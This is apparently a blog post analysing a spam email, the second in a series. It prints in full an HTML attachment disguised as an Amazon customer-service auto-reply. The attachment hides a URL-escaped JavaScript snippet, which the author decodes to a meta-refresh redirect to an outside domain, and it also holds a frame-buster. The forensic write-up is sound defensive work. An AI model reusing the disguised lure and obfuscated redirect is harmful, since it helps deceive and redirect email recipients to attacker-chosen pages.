Spam Forensics II

(Continued from Spam Forensics I)

Our email contained an attachment in html:

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
  <meta content="text/html; charset=ISO-8859-1"
 http-equiv="content-type">
  <title></title>
</head>
<body>
Greetings from <span class="il">Amazon</span>.com.<br>
<br>
We're sorry. &nbsp;You've written to an address that cannot accept
incoming<br>
e-mail. &nbsp;But that's OK--this automated response will direct
you to the<br>
right place at <span class="il">Amazon</span>.com
to answer your question or help you contact<br>
customer service if you need further assistance.<br>
<br>
You will find the answers to the most common questions here:<br>
<br>
&nbsp;Ordering: <a href="http://www.amazon.com/help/ordering"
 target="_blank">http://www.<span class="il">amazon</span>.com/help/<wbr>ordering</a><br>
&nbsp;Where's My Stuff: <a
 href="http://www.amazon.com/help/wheres-my-stuff"
 target="_blank">http://www.<span class="il">amazon</span>.com/help/<wbr>wheres-my-stuff</a><br>
&nbsp;Gift Certificates: <a
 href="http://www.amazon.com/gift-certificates" target="_blank">http://www.<span
 class="il">amazon</span>.com/gift-<wbr>certificates</a><br>
&nbsp;Promotions: <a
 href="http://www.amazon.com/o/tg/browse/-/565778/"
 target="_blank">http://www.<span class="il">amazon</span>.com/o/tg/<wbr>browse/-/565778/</a><br>
&nbsp;Shipping Options: <a
 href="http://www.amazon.com/help/shipping" target="_blank">http://www.<span
 class="il">amazon</span>.com/help/<wbr>shipping</a><br>
&nbsp;Returns: <a href="http://www.amazon.com/returns"
 target="_blank">http://www.<span class="il">amazon</span>.com/returns</a><br>
<br><script>if(frames){if(top.frames.length>0)top.location.href=self.location;}</script><script language=JavaScript>document.write(unescape('%3Cme%74a h%74tp%2Deq%75iv%3D%22r%65fr%65sh%22 co%6Ete%6Et%3D%220%3B%75rl%3Dht%74p%3A%2F%2Fg%72ad%75at%69on%6Fut%66it%74er%73%2Ec%6F%2Ez%61%2F1%2Eht%6Dl%22 %2F%3E%0D%0A%3Ct%61bl%65 wi%64th%3D%221%300%25%22 bo%72de%72%3D%22%30%22%3E%3Ctr %62gc%6Flo%72%3D%22%2355%3668%38%22 a%6Cig%6E%3D%22%63en%74er%22%3E%3C%74d%3E%3Ca h%72ef%3D%22h%74tp%3A%2F%2F%77ww%2Epu%6Cls%6Fft%2Eco%6D%2Fh%74ml%70ow%65r%2E%68tm%22%3E%3C%66on%74 fa%63e%3D%22Ar%69al%2C He%6Cve%74ic%61%2C s%61ns%2Dse%72if%22 co%6Cor%3D%22#%46FF%46FF%22 si%7Ae%3D%22%2D1%22%3ET%68is %57eb %50ag%65 wa%73 pr%6Fte%63te%64 by %48TM%4CPo%77er%2C  Cl%69ck %68er%65 to %52eg%69st%65r%3C%2Ffo%6Et%3E%3C%2Fa%3E%3C%2F%74d%3E%3C%2Ft%72%3E%3C%2Fta%62le%3E%0D%0A'))</script>
If your question is not answered by the above links, we invite you to<br>
search our Help Desk at <a href="http://www.amazon.com/help"
 target="_blank">http://www.<span class="il">amazon</span>.com/help</a><br>
<br>
If you need to modify an unshipped order or make changes to your<br>
account or subscriptions, you may do so online at any time via<br>
Your Account: &nbsp;<a href="http://www.amazon.com/your-account"
 target="_blank">http://www.<span class="il">amazon</span>.com/your-<wbr>account</a><br>
<br>
We hope our online resources meet all your needs. &nbsp;If you've
explored<br>
the above links but find you still need to get in touch with us,<br>
please click the "Contact Customer Service" link on our main Help page.<br>
<br>
Thanks for shopping at <span class="il">Amazon</span>.com.<br>
<br>
Sincerely,<br>
<br>
<span class="il">Amazon</span>.com Customer Service<br>
<a href="http://www.amazon.com" target="_blank">http://www.<span
 class="il">amazon</span>.com</a><br>
</body>
</html>

Which is pretty boring, containing some amazon links and otherwise benign code, except for line 37, which contains two JavaScript sections (formatting added):

<script>
    if(frames){
        if(top.frames.length>0)
            top.location.href=self.location;
    }
</script>

<script language=JavaScript>
    document.write(
        unescape('%3Cme%74a h%74tp%2Deq%75iv%3D%22r%65fr%65sh%22 co%6Ete%6Et%3D%220%3B%75rl%3Dht%74p%3A%2F%2Fg%72ad%75at%69on%6Fut%66it%74er%73%2Ec%6F%2Ez%61%2F1%2Eht%6Dl%22 %2F%3E%0D%0A%3Ct%61bl%65 wi%64th%3D%221%300%25%22 bo%72de%72%3D%22%30%22%3E%3Ctr %62gc%6Flo%72%3D%22%2355%3668%38%22 a%6Cig%6E%3D%22%63en%74er%22%3E%3C%74d%3E%3Ca h%72ef%3D%22h%74tp%3A%2F%2F%77ww%2Epu%6Cls%6Fft%2Eco%6D%2Fh%74ml%70ow%65r%2E%68tm%22%3E%3C%66on%74 fa%63e%3D%22Ar%69al%2C He%6Cve%74ic%61%2C s%61ns%2Dse%72if%22 co%6Cor%3D%22#%46FF%46FF%22 si%7Ae%3D%22%2D1%22%3ET%68is %57eb %50ag%65 wa%73 pr%6Fte%63te%64 by %48TM%4CPo%77er%2C  Cl%69ck %68er%65 to %52eg%69st%65r%3C%2Ffo%6Et%3E%3C%2Fa%3E%3C%2F%74d%3E%3C%2Ft%72%3E%3C%2Fta%62le%3E%0D%0A')
    )
</script>

The first section is quickly identified as a simple FrameBuster.

The section section simply inline inserts the value of the string, once it is unescaped. Using the tool found here, I unescaped the JavaScript string without worrying about what it did.

The result is (formatting added):

<meta http-equiv="refresh" content="0;url=http://graduationoutfitters.co.za/1.html" />
<table width="100%" border="0">
    <tr bgcolor="#556688" align="center">
        <td>
            <a href="http://www.pullsoft.com/htmlpower.htm">
                <font face="Arial, Helvetica, sans-serif" color="#FFFFFF" size="-1">
                    This Web Page was protected by HTMLPower,  Click here to Register
                </font>
            </a>
        </td>
    </tr>
</table>

This HTML meta tag “refreshes” or redirects your browser to whatever page is specified, in this case http://graduationoutfitters.co.za/1.html. (In case you’re wondering, the .za TLD is South Africa)

The humorous thing is, after looking at the pullsoft.com link, is appears the spammer used their software to encode the meta refresh tag, and the software appended a little advertisement. How thoughtful.

After all that, nothing crazy — a forged email header, an (unnecessarily) encoded html meta refresh tag and one more spam for the bit bucket.

Posted Friday, September 24th, 2010 under networking.

2 comments

  1. Nice writeup! I just got hit with a couple of these emails and glad to drop by and see your forensic work.

Leave a Reply